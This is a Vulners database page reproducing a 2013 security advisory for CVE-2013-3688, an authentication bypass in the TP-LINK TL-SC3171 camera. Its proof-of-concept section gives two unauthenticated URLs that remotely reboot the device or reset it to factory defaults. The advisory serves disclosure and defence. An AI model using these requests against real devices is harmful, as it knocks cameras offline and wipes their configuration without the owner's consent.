Vulners
Lucene search
TP-LINK TL-SC3171 Authentication Bypass
🗓️ 13 Jun 2013 00:00:00Reported by Javier Repiso SanchezType 
packetstorm🔗 packetstormsecurity.com👁 30 Views
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | TP-LINK TL-SC3171 Authentication Bypass Vulnerability | 14 Jun 201300:00 | – | zdt |
 | CVE-2013-3688 | 1 Oct 201319:00 | – | cve |
 | CVE-2013-3688 | 1 Oct 201319:00 | – | cvelist |
 | EUVD-2013-3621 | 7 Oct 202500:30 | – | euvd |
 | CVE-2013-3688 | 1 Oct 201319:55 | – | nvd |
 | Design/Logic Flaw | 1 Oct 201319:55 | – | prion |
 | CVE-2013-3688 | 22 May 202511:31 | – | redhatcve |
`===========================================================================
TP-LINK
====================================================================
===========================================================================
1.Advisory Information
Title: TP-LINK TL-SC3171 Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
The next vulnerability has been found in this device:
-CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with Unnecessary Privileges(CWE-250).
3.Affected Products
-CVE-2013-3688. The following product are affected: TP-LINK TL-SC3171
Its possible others models are affected but they were not checked.
4.PoC
4.1.Execute Remote Command bypassing authentication
CVE-2013-3688, Execute Remote Command bypassing authentication.
We have found that is possible to reboot this kind of devices remotely. The attack vector is the following one:
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/reboot
http://xx.xx.xx.xx/cgi-bin/hardfactorydefault
_____________________________________________________________________________
In the first one you will get blank page and you cant re-login until the device is reboot.
In the second one, you will get a victory message and of course, in the next login you should introduce factory settings.
5.Credits
-CVE-2013-3688, was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received.
-2013-06-03: Students asks for a reply.
-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and this has been corrected in a new beta firmware version.
-2013-06-04: Students answer to the vendor saying that this vulnerability is different from the Coresecurity vulnerabilities.
-2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity.
-2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is different.
-2013-06-06: TP-Link answer confirming that the vulnerability is fixed with the latest patch for the reported vulnerabilities generated by Coresecurity. The beta version is available on the website of TP-Link
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jun 2013 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.00625